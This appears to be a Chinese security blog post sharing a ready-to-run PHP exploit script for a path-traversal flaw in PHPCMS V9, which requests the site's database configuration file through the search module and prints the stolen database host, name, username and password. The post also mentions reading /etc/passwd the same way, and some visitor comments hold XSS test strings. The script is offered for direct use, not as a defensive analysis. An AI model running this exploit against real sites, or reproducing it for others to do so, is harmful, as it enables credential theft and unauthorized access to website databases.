正在阅读:

PHPCMS V9数据库密码读取EXP

14,972

乌云N早以前就爆出来的漏洞,详见http://www.wooyun.org/bugs/wooyun-2012-010072 最近我在学习php,就是为了写些个小工具出来玩玩,就拿了这个最简单的漏洞来练手了,希望兄弟们多支持!!!

其实利用这个漏洞还可以读/etc/passwd等文件,兄弟们可以自由发挥,而我新手只会写个读数据库密码的东西,兄弟们别bs我就行了。

代码如下,请保存为*.php 执行即可

<?php
/**
 * Created by 独自等待
 * User: Hack2012
 * Date: 13-2-4 下午11:32
 * FileName: PHPCMSV9_DB.php
 * 独自等待博客www.waitalone.cn
 */
print_r('
+------------------------------------------------------+
             PHPCMS_V9  数据库密码读取 EXP
             Site:http://www.waitalone.cn/
                Exploit BY: 独自等待
                   Time:2013-02-06
+------------------------------------------------------+
');
if ($argc < 3) {
    print_r('
+------------------------------------------------------+
Useage: php ' . $argv[0] . ' host path
Host: target server (ip/hostname)
Path: path to phpcms
Example: php ' . $argv[0] . ' localhost /phpcms/
+------------------------------------------------------+
    ');
    exit;
}
error_reporting(7);
$host = $argv[1];
$path = $argv[2];
$url = '/index.php?m=search&a=public_get_suggest_keyword&url=abc&q=../../caches/configs/database.php';
//echo payload($url);
$content = payload($url);
if (preg_match('/database/', $content)) {
    if (preg_match_all('/\'(\w+)\' => \'(\w+)\'/', $content, $result)) {
        //print_r($result);
        echo '主机名:' . $result[2][0] . "\n";
        echo '数据库:' . $result[2][1] . "\n";
        echo '用户名:' . $result[2][2] . "\n";
        echo '密  码:' . $result[2][3] . "\n";
        echo '表前缀:' . $result[2][4] . "\n";
    }
} else {
    echo '网站不存在此漏洞';
}
function payload($url)
{
    global $host, $path;
    $data = "GET " . $path . "$url  HTTP/1.1\r\n";
    $data .= "Host: $host\r\n";
    $data .= "User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:18.0) Gecko/20100101 Firefox/18.0\r\n";
    $data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
    $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $data .= "Accept-Language: zh-cn\r\n";
    $data .= "Connection: Close\r\n\r\n";
    $fp = @fsockopen($host, 80);
    if (!$fp) {
        die('Connect to host Error');
    }
    fwrite($fp, $data);
    $back = '';
    while (!feof($fp)) {
        $back .= fread($fp, 1024);
    }
    fclose($fp);
    return $back;
}

?>

phpcms数据库密码读取

目前有:3条访客评论,博主回复2

  1. Master
    2013-05-20 16:23

    良子木JJ 我来看看你了。
    Alert(/x/) [/可爱]

  2. Master
    2013-05-21 16:19

    弹tantantan%3Cscript%3Ealert%28/xss/%29%3C%2Fscript%3E

  3. aNsSe
    2014-11-22 09:00

    独自大哥 小弟来看看你

留下脚印,证明你来过。

*

*

流汗坏笑撇嘴大兵流泪发呆抠鼻吓到偷笑得意呲牙亲亲疑问调皮可爱白眼难过愤怒惊讶鼓掌